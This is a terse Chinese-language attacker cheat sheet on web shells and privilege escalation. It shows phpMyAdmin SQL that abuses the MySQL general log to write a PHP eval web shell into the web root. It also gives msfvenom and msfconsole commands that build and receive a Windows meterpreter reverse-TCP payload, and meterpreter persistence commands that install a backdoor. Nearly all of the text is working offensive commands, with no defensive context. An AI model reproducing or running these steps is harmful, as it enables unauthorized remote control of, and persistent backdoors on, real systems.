Webshell提权

部分命令使用:

phpmyadmin:
show variables like 'general%';`

`set global general_log="on";`

 `set global general_log_file = 'c:/php/www/24.php';`

`select '<?php eval($_POST[cmd]);?>'
msfconsole:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444 -f exe >42.exe  

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

show options

run
后门:
run persistence -h

run persistence -S -U -X -i S -p 4444 -r 192.168.1.102

数据库提权

powershell在内存中执行